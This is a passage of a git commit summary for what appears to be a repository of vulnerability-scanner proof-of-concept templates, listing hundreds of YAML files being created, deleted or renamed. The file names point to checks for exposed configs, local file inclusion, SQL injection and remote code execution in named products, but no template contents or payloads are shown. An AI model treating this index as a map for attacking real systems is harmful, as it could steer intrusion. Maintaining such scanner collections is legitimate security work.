poc/detect/olivetti-crf-detect-9244.yaml create mode 100644 poc/detect/oneblog-detect-9246.yaml create mode 100644 poc/detect/open-virtualization-manager-detect.yaml delete mode 100644 poc/detect/openemr-detect-9271.yaml create mode 100644 poc/detect/openemr-detect-9274.yaml delete mode 100644 poc/detect/opensis-detect-9313.yaml delete mode 100644 poc/detect/oracle-dbass-detect-9351.yaml delete mode 100644 poc/detect/oracle-dbass-detect.yaml create mode 100644 poc/detect/owasp-juice-shop-detected-9416.yaml rename poc/detect/{owasp-juice-shop-detected-9418.yaml => owasp-juice-shop-detected.yaml} (100%) delete mode 100644 poc/detect/pega-detect.yaml delete mode 100644 poc/detect/php-proxy-detect.yaml create mode 100644 poc/detect/phpcollab-detect-9499.yaml delete mode 100644 poc/detect/pi-hole-detect-9581.yaml create mode 100644 poc/detect/pi-hole-detect-9582.yaml delete mode 100644 poc/detect/plone-cms-detect-9607.yaml rename poc/detect/{plone-cms-detect.yaml => plone-cms-detect-9608.yaml} (100%) create mode 100644 poc/detect/prestashop-detect-9651.yaml delete mode 100644 poc/detect/prestashop-detect.yaml delete mode 100644 poc/detect/prtg-detect-9706.yaml delete mode 100644 poc/detect/puppet-node-manager-detect-9720.yaml create mode 100644 poc/detect/puppet-node-manager-detect.yaml delete mode 100644 poc/detect/puppetserver-detect-9722.yaml create mode 100644 poc/detect/redmine-cli-detect-9854.yaml create mode 100644 poc/detect/rhymix-cms-detect-9878.yaml delete mode 100644 poc/detect/rseenet-detect-9916.yaml create mode 100644 poc/detect/rseenet-detect.yaml delete mode 100644 poc/detect/rstudio-detect-9917.yaml create mode 100644 poc/detect/rstudio-detect-9919.yaml delete mode 100644 poc/detect/sap-netweaver-detect-10047.yaml delete mode 100644 poc/detect/sap-recon-detect-10063.yaml create mode 100644 poc/detect/sceditor-detect-10093.yaml create mode 100644 poc/detect/secmail-detect-10109.yaml delete mode 100644 poc/detect/secmail-detect-10112.yaml create mode 100644 poc/detect/seeddms-detect-10131.yaml delete mode 100644 poc/detect/shiro-detect-10196.yaml delete mode 100644 poc/detect/shopware-detect-10211.yaml delete mode 100644 poc/detect/smartstore-detect.yaml create mode 100644 poc/detect/sonicwall-email-security-detect-10384.yaml delete mode 100644 poc/detect/sonicwall-email-security-detect.yaml create mode 100644 poc/detect/tableau-server-detect-10643.yaml delete mode 100644 poc/detect/tableau-server-detect.yaml create mode 100644 poc/detect/tech-detect-10672.yaml delete mode 100644 poc/detect/tech-detect-10673.yaml delete mode 100644 poc/detect/telerik-dialoghandler-detect-10690.yaml create mode 100644 poc/detect/telerik-dialoghandler-detect-10691.yaml create mode 100644 poc/detect/thinkcmf-detection-10719.yaml create mode 100644 poc/detect/tibco-spotfire-services-detect.yaml create mode 100644 poc/detect/unauthorized-puppet-node-manager-detect-10958.yaml delete mode 100644 poc/detect/unauthorized-puppet-node-manager-detect-10959.yaml delete mode 100644 poc/detect/virtual-ema-detect-11024.yaml create mode 100644 poc/detect/virtual-ema-detect-11025.yaml rename poc/detect/{vmware-vrealize-detect-11057.yaml => vmware-vrealize-detect.yaml} (100%) delete mode 100644 poc/detect/vsftpd-detection-11073.yaml create mode 100644 poc/detect/vsftpd-detection-11075.yaml delete mode 100644 poc/detect/waf-detect-11086.yaml create mode 100644 poc/detect/waf-detect-11087.yaml create mode 100644 poc/detect/wamp-xdebug-detect-11104.yaml delete mode 100644 poc/detect/web-ftp-detect-11136.yaml create mode 100644 poc/detect/web-suite-detect-11168.yaml delete mode 100644 poc/detect/web-suite-detect.yaml rename poc/detect/{weblogic-t3-detect-11152.yaml => weblogic-t3-detect-11153.yaml} (100%) create mode 100644 poc/detect/wondercms-detect-11222.yaml delete mode 100644 poc/detect/wondercms-detect.yaml rename poc/detect/{wordpress-detect-11261.yaml => wordpress-detect-11260.yaml} (100%) delete mode 100644 poc/detect/wordpress-gotmls-detect-11280.yaml delete mode 100644 poc/detect/worksites-detection-11384.yaml delete mode 100644 poc/detect/wowza-streaming-detect.yaml delete mode 100644 poc/detect/wso2-apimanager-detect-11638.yaml create mode 100644 poc/detect/wuzhicms-detect-11654.yaml create mode 100644 poc/detect/wuzhicms-detect.yaml create mode 100644 poc/detect/yourls-detect.yaml rename poc/detect/{zentao-detect-11787.yaml => zentao-detect-11785.yaml} (100%) delete mode 100644 poc/directory_listing/ecology-springframework-directory-traversal-7175.yaml create mode 100644 poc/directory_listing/ecology-springframework-directory-traversal.yaml delete mode 100644 poc/directory_listing/elfinder-path-traversal-7203.yaml rename poc/directory_listing/{elFinder-path-traversal.yaml => elfinder-path-traversal.yaml} (100%) delete mode 100644 poc/directory_listing/kingdee-eas-directory-traversal.yaml rename poc/directory_listing/{natshell-path-traversal.yaml => natshell-path-traversal-9006.yaml} (100%) delete mode 100644 poc/directory_listing/oa-tongda-path-traversal-9178.yaml delete mode 100644 poc/directory_listing/oa-tongda-path-traversal-9179.yaml create mode 100644 poc/directory_listing/pmb-directory-traversal.yaml rename poc/directory_listing/{tpshop-directory-traversal-10823.yaml => tpshop-directory-traversal-10821.yaml} (100%) create mode 100644 poc/directory_listing/tpshop-directory-traversal.yaml rename poc/directory_listing/{wooyun-path-traversal.yaml => wooyun-path-traversal-11230.yaml} (100%) delete mode 100644 poc/directory_listing/wooyun-path-traversal-11232.yaml delete mode 100644 poc/docker/amazon-docker-config-280.yaml delete mode 100644 poc/docker/amazon-docker-config-disclosure-278.yaml create mode 100644 poc/docker/amazon-docker-config.yaml delete mode 100644 poc/docker/aws-ecs-container-agent-tasks-641.yaml delete mode 100644 poc/docker/docker-compose-config-7059.yaml create mode 100644 poc/docker/docker-compose-config.yaml delete mode 100644 poc/docker/docker-registry-7068.yaml delete mode 100644 poc/docker/dockercfg-config.yaml create mode 100644 poc/docker/dockerfile-hidden-disclosure-7061.yaml delete mode 100644 poc/docker/dockerfile-hidden-disclosure-7063.yaml create mode 100644 poc/docker/kubernetes-enterprise-manager-8528.yaml delete mode 100644 poc/docker/kubernetes-enterprise-manager-8529.yaml delete mode 100644 poc/docker/kubernetes-kustomization-disclosure.yaml delete mode 100644 poc/docker/kubernetes-metrics.yaml create mode 100644 poc/docker/kubernetes-pods-8542.yaml delete mode 100644 poc/docker/kubernetes-pods-8543.yaml rename poc/docker/{kubernetes-unauth.yaml => kubernetes-unauth(1).yaml} (100%) rename poc/docker/{kubernetes-version.yaml => kubernetes-version-8552.yaml} (100%) rename poc/docker/{misconfigured-docker-8902.yaml => misconfigured-docker-8900.yaml} (100%) delete mode 100644 poc/drupal/drupal-install-7105.yaml delete mode 100644 poc/drupal/drupal-user-enum-ajax-7111.yaml create mode 100644 poc/elk/elasticsearch-sql-client-detect-7190.yaml rename poc/elk/{kibana-detect-8484.yaml => kibana-detect-8483.yaml} (100%) create mode 100644 poc/elk/kibana-panel-8485.yaml delete mode 100644 poc/elk/kibana-panel-8486.yaml delete mode 100644 poc/exposed/active-admin-exposure-42.yaml create mode 100644 poc/exposed/active-admin-exposure-43.yaml delete mode 100644 poc/exposed/adobe-connect-username-exposure-100.yaml create mode 100644 poc/exposed/airflow-configuration-exposure-230.yaml delete mode 100644 poc/exposed/airflow-configuration-exposure.yaml delete mode 100644 poc/exposed/amazon-docker-config-disclosure-278.yaml rename poc/exposed/{android-debug-database-exposed-316.yaml => android-debug-database-exposed-314.yaml} (100%) create mode 100644 poc/exposed/ansible-config-disclosure-326.yaml delete mode 100644 poc/exposed/ansible-config-disclosure.yaml create mode 100644 poc/exposed/appspec-yml-disclosure-529.yaml rename poc/exposed/{axiom-digitalocean-key-exposure-667.yaml => axiom-digitalocean-key-exposure.yaml} (100%) create mode 100644 poc/exposed/beward-ipcamera-disclosure-715.yaml rename poc/exposed/{caucho-resin-info-disclosure.yaml => caucho-resin-info-disclosure-871.yaml} (100%) create mode 100644 poc/exposed/cisco-meraki-exposure-944.yaml delete mode 100644 poc/exposed/cisco-meraki-exposure-946.yaml rename poc/exposed/{cisco-smi-exposure-972.yaml => cisco-smi-exposure-971.yaml} (100%) create mode 100644 poc/exposed/clockwork-dashboard-exposure-1015.yaml create mode 100644 poc/exposed/commax-credentials-disclosure-1160.yaml delete mode 100644 poc/exposed/couchdb-exposure-1238.yaml create mode 100644 poc/exposed/couchdb-exposure-1239.yaml create mode 100644 poc/exposed/credentials-disclosure-1256.yaml create mode 100644 poc/exposed/django-debug-exposed-404.yaml create mode 100644 poc/exposed/dockerfile-hidden-disclosure-7061.yaml delete mode 100644 poc/exposed/dockerfile-hidden-disclosure-7063.yaml delete mode 100644 poc/exposed/druid-console-exposure-7092.yaml create mode 100644 poc/exposed/exposed-adb-7282.yaml create mode 100644 poc/exposed/exposed-alps-spring-7283.yaml create mode 100644 poc/exposed/exposed-bitkeeper-7292.yaml rename poc/exposed/{exposed-darcs-7298.yaml => exposed-darcs-7297.yaml} (100%) create mode 100644 poc/exposed/exposed-docker-api-7301.yaml delete mode 100644 poc/exposed/exposed-gitignore-7303.yaml create mode 100644 poc/exposed/exposed-hg-7312.yaml delete mode 100644 poc/exposed/exposed-jquery-file-upload.yaml create mode 100644 poc/exposed/exposed-kafdrop-7318.yaml delete mode 100644 poc/exposed/exposed-nomad-7328.yaml delete mode 100644 poc/exposed/exposed-nomad-7330.yaml create mode 100644 poc/exposed/exposed-redis-7339.yaml delete mode 100644 poc/exposed/exposed-sharepoint-list-7345.yaml create mode 100644 poc/exposed/exposed-svn-7351.yaml delete mode 100644 poc/exposed/exposed-vscode-7357.yaml create mode 100644 poc/exposed/exposed-vscode.yaml create mode 100644 poc/exposed/exposed-webalizer-7358.yaml delete mode 100644 poc/exposed/exposed-webalizer-7360.yaml delete mode 100644 poc/exposed/exposed-zookeeper-7365.yaml create mode 100644 poc/exposed/fanruanoa2012-disclosure-7389.yaml delete mode 100644 poc/exposed/fanruanoa2012-disclosure.yaml delete mode 100644 poc/exposed/firebase-config-exposure.yaml delete mode 100644 poc/exposed/flink-exposure-7509.yaml create mode 100644 poc/exposed/flink-exposure-7511.yaml delete mode 100644 poc/exposed/ftp-credentials-exposure-7568.yaml create mode 100644 poc/exposed/ftp-credentials-exposure.yaml create mode 100644 poc/exposed/git-credentials-disclosure-7641.yaml rename poc/exposed/{git-credentials-disclosure-7640.yaml => git-credentials-disclosure.yaml} (100%) create mode 100644 poc/exposed/github-workflows-disclosure-7664.yaml delete mode 100644 poc/exposed/github-workflows-disclosure-7666.yaml delete mode 100644 poc/exposed/glpi-telemetry-disclosure-7739.yaml create mode 100644 poc/exposed/gogs-install-exposure-7755.yaml delete mode 100644 poc/exposed/hp-ilo-serial-key-disclosure-8023.yaml create mode 100644 poc/exposed/hp-ilo-serial-key-disclosure-8025.yaml create mode 100644 poc/exposed/jfrog-unauth-build-exposed-8299.yaml delete mode 100644 poc/exposed/jolokia-info-disclosure-8358.yaml create mode 100644 poc/exposed/jolokia-info-disclosure-8359.yaml delete mode 100644 poc/exposed/kubernetes-kustomization-disclosure.yaml delete mode 100644 poc/exposed/lvmeng-uts-disclosure-8680.yaml create mode 100644 poc/exposed/magento-2-exposed-api-8688.yaml delete mode 100644 poc/exposed/magento-config-disclosure.yaml create mode 100644 poc/exposed/netgear-router-exposure.yaml delete mode 100644 poc/exposed/oracle-ebs-sqllog-disclosure-9369.yaml delete mode 100644 poc/exposed/pgadmin-exposure-9490.yaml create mode 100644 poc/exposed/pgadmin-exposure-9491.yaml rename poc/exposed/{pmb-local-file-disclosure-9620.yaml => pmb-local-file-disclosure-9619.yaml} (100%) create mode 100644 poc/exposed/pmb-local-file-disclosure.yaml delete mode 100644 poc/exposed/prometheus-exposed-panel-9681.yaml rename poc/exposed/{putty-private-key-disclosure-9732.yaml => putty-private-key-disclosure-9730.yaml} (100%) delete mode 100644 poc/exposed/pyproject-disclosure-9737.yaml create mode 100644 poc/exposed/pyproject-disclosure-9738.yaml create mode 100644 poc/exposed/qihang-media-disclosure-9764.yaml create mode 100644 poc/exposed/qihang-media-disclosure.yaml delete mode 100644 poc/exposed/rails-secret-token-disclosure-9809.yaml create mode 100644 poc/exposed/rails-secret-token-disclosure-9810.yaml rename poc/exposed/{roundcube-log-disclosure-9905.yaml => roundcube-log-disclosure-9907.yaml} (100%) create mode 100644 poc/exposed/ruijie-information-disclosure-9931.yaml create mode 100644 poc/exposed/selenium-exposure-10137.yaml delete mode 100644 poc/exposed/selenium-exposure-10138.yaml delete mode 100644 poc/exposed/sensitive-storage-exposure.yaml delete mode 100644 poc/exposed/setup-page-exposure-10181.yaml create mode 100644 poc/exposed/snyk-ignore-file-disclosure-10347.yaml delete mode 100644 poc/exposed/snyk-ignore-file-disclosure-10349.yaml create mode 100644 poc/exposed/solr-exposure-10364.yaml delete mode 100644 poc/exposed/solr-exposure-10366.yaml delete mode 100644 poc/exposed/thinkphp-509-information-disclosure-10755.yaml rename poc/exposed/{thumbs-db-disclosure.yaml => thumbs-db-disclosure-10763.yaml} (100%) delete mode 100644 poc/exposed/tugboat-config-exposure-10842.yaml rename poc/exposed/{tugboat-config-exposure.yaml => tugboat-config-exposure-10843.yaml} (100%) rename poc/exposed/{watchguard-credentials-disclosure-11106.yaml => watchguard-credentials-disclosure.yaml} (100%) create mode 100644 poc/exposed/wordpress-wpcourses-info-disclosure-11369.yaml delete mode 100644 poc/exposed/wordpress-wpcourses-info-disclosure-11371.yaml create mode 100644 poc/exposed/wp-full-path-disclosure-11455.yaml delete mode 100644 poc/exposed/wp-full-path-disclosure-11457.yaml rename poc/exposed/{yarn-manager-exposure-11733.yaml => yarn-manager-exposure-11731.yaml} (100%) delete mode 100644 poc/exposed/zenphoto-installation-sensitive-info.yaml create mode 100644 poc/exposed/zenphoto-sensitive-info-11784.yaml create mode 100644 poc/extract/extract-urls-7370.yaml delete mode 100644 poc/favicon/favicon-detection-7441.yaml create mode 100644 poc/ftp/crush-ftp-detect-1272.yaml create mode 100644 poc/ftp/crush-ftp-login-1275.yaml create mode 100644 poc/ftp/crushftp-default-login.yaml delete mode 100644 poc/ftp/ftp-credentials-exposure-7568.yaml create mode 100644 poc/ftp/ftp-credentials-exposure.yaml delete mode 100644 poc/ftp/ftp-weak-credentials-7570.yaml rename poc/ftp/{ftpconfig.yaml => ftpconfig-7565.yaml} (100%) delete mode 100644 poc/ftp/unauth-ftp-10942.yaml delete mode 100644 poc/ftp/vsftpd-detection-11073.yaml create mode 100644 poc/ftp/vsftpd-detection-11075.yaml delete mode 100644 poc/ftp/web-ftp-detect-11136.yaml create mode 100644 poc/fuzz/lfi-linux-fuzz.yaml rename poc/gcloud/{GCP-service-account.yaml => GCP-service-account (copy 1).yaml} (100%) create mode 100644 poc/gcloud/gcp-service-account-11851.yaml rename poc/git/{axiom-digitalocean-key-exposure-667.yaml => axiom-digitalocean-key-exposure.yaml} (100%) delete mode 100644 poc/git/exposed-gitignore-7303.yaml create mode 100644 poc/git/git-config-7635.yaml rename poc/git/{git-config-nginxoffbyslash-7632.yaml => git-config-nginxoffbyslash-7628.yaml} (100%) create mode 100644 poc/git/git-config-nginxoffbyslash-7630.yaml create mode 100644 poc/git/git-credentials-disclosure-7641.yaml rename poc/git/{git-credentials-disclosure-7640.yaml => git-credentials-disclosure.yaml} (100%) create mode 100644 poc/git/gitbook-takeover-7627.yaml create mode 100644 poc/git/github-enterprise-detect-7649.yaml create mode 100644 poc/git/github-gemfile-files-7653.yaml create mode 100644 poc/git/github-page-config-7654.yaml create mode 100644 poc/git/github-workflows-disclosure-7664.yaml delete mode 100644 poc/git/github-workflows-disclosure-7666.yaml delete mode 100644 poc/git/gitlab-public-repos.yaml delete mode 100644 poc/git/gitlab-public-signup-7683.yaml delete mode 100644 poc/git/gitlab-weak-login.yaml delete mode 100644 poc/git/wordpress-git-config-11278.yaml create mode 100644 poc/google/api-google-drive-432.yaml delete mode 100644 poc/google/api-google-drive.yaml create mode 100644 poc/google/google-earth-dlogin-7781.yaml rename poc/{social/facebook-secrets.yaml => google/google-secrets.yaml} (100%) create mode 100644 poc/google/google-storage-7788.yaml delete mode 100644 poc/graphql/graphql-alias-batching.yaml create mode 100644 poc/graphql/graphql-array-batching.yaml create mode 100644 poc/graphql/graphql-detect-7830.yaml delete mode 100644 poc/graphql/graphql-detect-7831.yaml delete mode 100644 poc/graphql/graphql-get-method.yaml create mode 100644 poc/graphql/hasura-graphql-ssrf-7905.yaml create mode 100644 poc/header/header-command-injection-7919.yaml delete mode 100644 poc/header/host-header-injection-8000.yaml delete mode 100644 poc/header/host-header-poisoning.yaml delete mode 100644 poc/header/http-missing-security-headers.yaml create mode 100644 poc/header/log4j-header.yaml create mode 100644 poc/header/oob-header-based-interaction-9250.yaml create mode 100644 poc/header/oob-header-based-interaction.yaml delete mode 100644 poc/header/sqli_header-10504.yaml delete mode 100644 poc/http/apache-httpd-rce-362.yaml delete mode 100644 poc/http/cl-te-http-smuggling.yaml delete mode 100644 poc/http/default-lighttpd-page-6866.yaml delete mode 100644 poc/http/http-missing-security-headers.yaml rename poc/{other/dns-value-share-template-3.yaml => http/http-value-share-template-2.yaml} (100%) delete mode 100644 poc/http/httpbin-open-redirect.yaml delete mode 100644 poc/http/httpbin-panel-8051.yaml create mode 100644 poc/http/httpd-config-8055.yaml delete mode 100644 poc/http/httpd-config.yaml delete mode 100644 poc/http/ibm-http-server.yaml create mode 100644 poc/http/oracle-http-server-12c-9384.yaml create mode 100644 poc/ibm/ibm-advanced-system-management-8088.yaml delete mode 100644 poc/ibm/ibm-advanced-system-management-8090.yaml delete mode 100644 poc/ibm/ibm-http-server.yaml rename poc/ibm/{ibm-note-login-8110.yaml => ibm-note-login-8112.yaml} (100%) delete mode 100644 poc/ibm/ibm-service-assistant-8118.yaml delete mode 100644 poc/injection/buffalo-config-injection-798.yaml create mode 100644 poc/injection/buffalo-config-injection-800.yaml create mode 100644 poc/injection/buffalo-config-injection-801.yaml create mode 100644 poc/injection/crlf-injection-1262.yaml create mode 100644 poc/injection/duomicms-sql-injection-7124.yaml create mode 100644 poc/injection/duomicms-sql-injection.yaml create mode 100644 poc/injection/glpi-9.3.3-sql-injection.yaml create mode 100644 poc/injection/header-command-injection-7919.yaml delete mode 100644 poc/injection/host-header-injection-8000.yaml create mode 100644 poc/java/default-jetty-page-6862.yaml delete mode 100644 poc/java/ecology-springframework-directory-traversal-7175.yaml create mode 100644 poc/java/ecology-springframework-directory-traversal.yaml create mode 100644 poc/java/exposed-alps-spring-7283.yaml create mode 100644 poc/java/java-rmi-detect-8227.yaml create mode 100644 poc/java/jboss-detect-8237.yaml delete mode 100644 poc/java/jboss-detect.yaml delete mode 100644 poc/java/jetty-showcontexts-enable-8297.yaml create mode 100644 poc/java/jinfornet-jreport-lfi-8307.yaml delete mode 100644 poc/java/jinfornet-jreport-lfi-8308.yaml delete mode 100644 poc/java/jsf-detection-8397.yaml create mode 100644 poc/java/jsf-detection-8398.yaml delete mode 100644 poc/java/public-tomcat-manager-9708.yaml delete mode 100644 poc/java/shiro-detect-10196.yaml delete mode 100644 poc/java/spring-framework-exceptions-10493.yaml create mode 100644 poc/java/spring-framework-exceptions.yaml create mode 100644 poc/java/springForShell-CVE-2022-22963.yaml delete mode 100644 poc/java/springboot-actuator-10435.yaml create mode 100644 poc/java/springboot-actuators-jolokia-xxe-10430.yaml delete mode 100644 poc/java/springboot-actuators-jolokia-xxe-10431.yaml delete mode 100644 poc/java/springboot-autoconfig.yaml create mode 100644 poc/java/springboot-configprops-10442.yaml create mode 100644 poc/java/springboot-env-10450.yaml rename poc/java/{springboot-h2-db-rce-10457.yaml => springboot-h2-db-rce.yaml} (100%) create mode 100644 poc/java/springboot-health-10459.yaml delete mode 100644 poc/java/springboot-health.yaml delete mode 100644 poc/java/springboot-heapdump-10463.yaml create mode 100644 poc/java/springboot-info.yaml delete mode 100644 poc/java/springboot-loggers-10476.yaml create mode 100644 poc/java/springboot-loggers-10477.yaml create mode 100644 poc/java/springboot-mappings-10478.yaml delete mode 100644 poc/java/springboot-mappings-10481.yaml delete mode 100644 poc/java/springboot-threaddump-10486.yaml delete mode 100644 poc/java/springboot-trace.yaml delete mode 100644 poc/java/struts-problem-report-10563.yaml create mode 100644 poc/java/struts-problem-report-10564.yaml create mode 100644 poc/java/tomcat-default-login.yaml delete mode 100644 poc/java/tomcat-pathnormalization.yaml rename poc/java/{weblogic-t3-detect-11152.yaml => weblogic-t3-detect-11153.yaml} (100%) delete mode 100644 poc/java/weblogic-weak-login-11154.yaml rename poc/java/{webview-addjavascript-interface-11177.yaml => webview-addjavascript-interface-11176.yaml} (100%) rename poc/java/{wildfly-panel-11211.yaml => wildfly-panel-11209.yaml} (100%) delete mode 100644 poc/javascript/bower-json-769.yaml create mode 100644 poc/javascript/bower-json.yaml delete mode 100644 poc/javascript/fastjson-1-2-24-rce.yaml create mode 100644 poc/javascript/fastjson-1-2-41-rce.yaml rename poc/javascript/{fastjson-1-2-42-rce.yaml => fastjson-1-2-42-rce-7408.yaml} (100%) create mode 100644 poc/javascript/fastjson-1-2-43-rce-7412.yaml create mode 100644 poc/javascript/fastjson-1-2-62-rce-7419.yaml delete mode 100644 poc/javascript/jsf-detection-8397.yaml create mode 100644 poc/javascript/jsf-detection-8398.yaml delete mode 100644 poc/javascript/jsherp-boot-panel.yaml rename poc/javascript/{keycloak-json-8472.yaml => keycloak-json-8473.yaml} (100%) create mode 100644 poc/javascript/package-json-9421.yaml delete mode 100644 poc/javascript/package-json.yaml rename poc/javascript/{webview-addjavascript-interface-11177.yaml => webview-addjavascript-interface-11176.yaml} (100%) rename poc/jenkins/{jenkins-default.yaml => jenkins-default-8272.yaml} (100%) delete mode 100644 poc/jenkins/jenkins-detect-8275.yaml create mode 100644 poc/jenkins/jenkins-detect-8276.yaml delete mode 100644 poc/jenkins/jenkins-login-8277.yaml create mode 100644 poc/jenkins/jenkins-login-8280.yaml delete mode 100644 poc/jenkins/jenkins-script-8284.yaml create mode 100644 poc/jenkins/jenkins-script.yaml create mode 100644 poc/jenkins/jenkins-stack-trace-8285.yaml rename poc/joomla/{joomla-com-fabrik-lfi-8371.yaml => joomla-com-fabrik-lfi.yaml} (100%) create mode 100644 poc/joomla/joomla-file-listing-8380.yaml delete mode 100644 poc/joomla/joomla-file-listing.yaml create mode 100644 poc/joomla/joomla-panel-8389.yaml delete mode 100644 poc/joomla/joomla-panel-8391.yaml delete mode 100644 poc/joomla/joomla-workflow.yaml create mode 100644 poc/joomla/rusty-joomla.yaml create mode 100644 poc/kafka/kafka-center-default-login.yaml create mode 100644 poc/kafka/kafka-consumer-monitor-8424.yaml delete mode 100644 poc/kafka/kafka-consumer-monitor-8425.yaml create mode 100644 poc/kafka/kafka-monitoring-8428.yaml delete mode 100644 poc/kafka/kafka-monitoring-8431.yaml delete mode 100644 poc/laravel/laravel-debug-enabled-8576.yaml delete mode 100644 poc/laravel/laravel-debug-enabled.yaml create mode 100644 poc/laravel/laravel-env-8582.yaml create mode 100644 poc/laravel/laravel-ignition-xss.yaml delete mode 100644 poc/laravel/laravel-log-file-8596.yaml create mode 100644 poc/ldap/phpldapadmin-panel.yaml create mode 100644 poc/local_file_inclusion/accent-microcomputers-lfi-16.yaml delete mode 100644 poc/local_file_inclusion/accent-microcomputers-lfi-17.yaml delete mode 100644 poc/local_file_inclusion/ad-widget-lfi-124.yaml create mode 100644 poc/local_file_inclusion/admin-word-count-column-lfi-81.yaml rename poc/local_file_inclusion/{advanced-access-manager-lfi-118.yaml => advanced-access-manager-lfi-116.yaml} (100%) delete mode 100644 poc/local_file_inclusion/advanced-access-manager-lfi.yaml delete mode 100644 poc/local_file_inclusion/asanhamayesh-lfi-552.yaml create mode 100644 poc/local_file_inclusion/asanhamayesh-lfi-553.yaml delete mode 100644 poc/local_file_inclusion/bems-api-lfi-709.yaml delete mode 100644 poc/local_file_inclusion/bems-api-lfi-712.yaml delete mode 100644 poc/local_file_inclusion/blue-ocean-excellence-lfi-756.yaml delete mode 100644 poc/local_file_inclusion/brandfolder-lfi.yaml delete mode 100644 poc/local_file_inclusion/bullwark-momentum-lfi-807.yaml create mode 100644 poc/local_file_inclusion/cherry-lfi-903.yaml delete mode 100644 poc/local_file_inclusion/churchope-lfi.yaml create mode 100644 poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1284.yaml rename poc/local_file_inclusion/{cs-cart-unauthenticated-lfi-1285.yaml => cs-cart-unauthenticated-lfi.yaml} (100%) delete mode 100644 poc/local_file_inclusion/db-backup-lfi-6774.yaml create mode 100644 poc/local_file_inclusion/db-backup-lfi-6775.yaml delete mode 100644 poc/local_file_inclusion/diarise-theme-lfi.yaml delete mode 100644 poc/local_file_inclusion/elfinder-path-traversal-7203.yaml rename poc/local_file_inclusion/{elFinder-path-traversal.yaml => elfinder-path-traversal.yaml} (100%) delete mode 100644 poc/local_file_inclusion/elfinder-version.yaml create mode 100644 poc/local_file_inclusion/generic-windows-lfi-7591.yaml create mode 100644 poc/local_file_inclusion/global-domains-lfi.yaml delete mode 100644 poc/local_file_inclusion/goip-1-lfi-7764.yaml create mode 100644 poc/local_file_inclusion/groupoffice-lfi-7849.yaml create mode 100644 poc/local_file_inclusion/groupoffice-lfi.yaml create mode 100644 poc/local_file_inclusion/gsoap-lfi.yaml delete mode 100644 poc/local_file_inclusion/hide-security-enhancer-lfi.yaml delete mode 100644 poc/local_file_inclusion/huawei-hg255s-lfi-8060.yaml delete mode 100644 poc/local_file_inclusion/huawei-hg659-lfi.yaml create mode 100644 poc/local_file_inclusion/issuu-panel-lfi.yaml delete mode 100644 poc/local_file_inclusion/jeewms-lfi.yaml create mode 100644 poc/local_file_inclusion/jinfornet-jreport-lfi-8307.yaml delete mode 100644 poc/local_file_inclusion/jinfornet-jreport-lfi-8308.yaml create mode 100644 poc/local_file_inclusion/jolokia-unauthenticated-lfi-8366.yaml rename poc/local_file_inclusion/{jolokia-unauthenticated-lfi-8364.yaml => jolokia-unauthenticated-lfi.yaml} (100%) rename poc/local_file_inclusion/{joomla-com-fabrik-lfi-8371.yaml => joomla-com-fabrik-lfi.yaml} (100%) create mode 100644 poc/local_file_inclusion/lfi-linux-fuzz.yaml create mode 100644 poc/local_file_inclusion/minimouse-lfi-8877.yaml delete mode 100644 poc/local_file_inclusion/moodle-filter-jmol-lfi-8938.yaml delete mode 100644 poc/local_file_inclusion/mpsec-lfi.yaml delete mode 100644 poc/local_file_inclusion/opencti-lfi-9268.yaml delete mode 100644 poc/local_file_inclusion/opensis-lfi.yaml create mode 100644 poc/local_file_inclusion/orbiteam-bscw-server-lfi-9404.yaml rename poc/local_file_inclusion/{pacsone-server-lfi.yaml => pacsone-server-lfi-9428.yaml} (100%) delete mode 100644 poc/local_file_inclusion/pikpikculfi.yaml delete mode 100644 poc/local_file_inclusion/qihang-media-lfi-9769.yaml create mode 100644 poc/local_file_inclusion/qihang-media-lfi.yaml create mode 100644 poc/local_file_inclusion/samsung-wlan-ap-lfi-10000.yaml delete mode 100644 poc/local_file_inclusion/samsung-wlan-ap-lfi-9999.yaml create mode 100644 poc/local_file_inclusion/simple-image-manipulator-lfi-10282.yaml create mode 100644 poc/local_file_inclusion/sl-studio-lfi.yaml create mode 100644 poc/local_file_inclusion/sofneta-mecdream-pacs-lfi.yaml create mode 100644 poc/local_file_inclusion/thinkcmf-lfi-10721.yaml delete mode 100644 poc/local_file_inclusion/thinkcmf-lfi-10723.yaml create mode 100644 poc/local_file_inclusion/video-synchro-pdf-lfi-11007.yaml delete mode 100644 poc/local_file_inclusion/vmware-vcenter-lfi-11047.yaml create mode 100644 poc/local_file_inclusion/vmware-vcenter-lfi.yaml delete mode 100644 poc/local_file_inclusion/wordpress-lfi.yaml create mode 100644 poc/local_file_inclusion/wordpress-wordfence-lfi-11346.yaml delete mode 100644 poc/local_file_inclusion/wordpress-wordfence-lfi-11350.yaml create mode 100644 poc/local_file_inclusion/wp-javospot-lfi-11482.yaml delete mode 100644 poc/local_file_inclusion/wp-javospot-lfi.yaml create mode 100644 poc/local_file_inclusion/wp-memphis-documents-library-lfi-11495.yaml delete mode 100644 poc/local_file_inclusion/wp-simple-fields-lfi-11569.yaml rename poc/local_file_inclusion/{wp-tutor-lfi-11600.yaml => wp-tutor-lfi.yaml} (100%) create mode 100644 poc/local_file_inclusion/xerox-efi-lfi.yaml create mode 100644 poc/local_file_inclusion/yishaadmin-lfi.yaml create mode 100644 poc/magento/magento-2-exposed-api-8688.yaml create mode 100644 poc/magento/magento-admin-panel-8690.yaml delete mode 100644 poc/magento/magento-admin-panel-8692.yaml delete mode 100644 poc/magento/magento-cacheleak-8699.yaml delete mode 100644 poc/magento/magento-config-disclosure.yaml rename poc/microsoft/{74cms-sqli-10.yaml => 74cms-sqli.yaml} (100%) rename poc/microsoft/{aims-password-mgmt-client-218.yaml => aims-password-mgmt-client-219.yaml} (100%) create mode 100644 poc/microsoft/aims-password-mgmt-client-221.yaml create mode 100644 poc/microsoft/aims-password-portal-225.yaml delete mode 100644 poc/microsoft/bems-api-lfi-709.yaml delete mode 100644 poc/microsoft/bems-api-lfi-712.yaml delete mode 100644 poc/microsoft/bolt-cms-panel-762.yaml create mode 100644 poc/microsoft/bolt-cms-panel-763.yaml rename poc/microsoft/{call-break-cms-840.yaml => call-break-cms-838.yaml} (100%) delete mode 100644 poc/microsoft/chamilo-lms-sqli-892.yaml create mode 100644 poc/microsoft/chamilo-lms-sqli.yaml create mode 100644 poc/microsoft/cisco-systems-login-973.yaml delete mode 100644 poc/microsoft/cisco-systems-login-975.yaml delete mode 100644 poc/microsoft/craft-cms-detect.yaml create mode 100644 poc/microsoft/dedecms-carbuyaction-fileinclude-6794.yaml rename poc/microsoft/{dedecms-carbuyaction-fileinclude-6792.yaml => dedecms-carbuyaction-fileinclude.yaml} (100%) rename 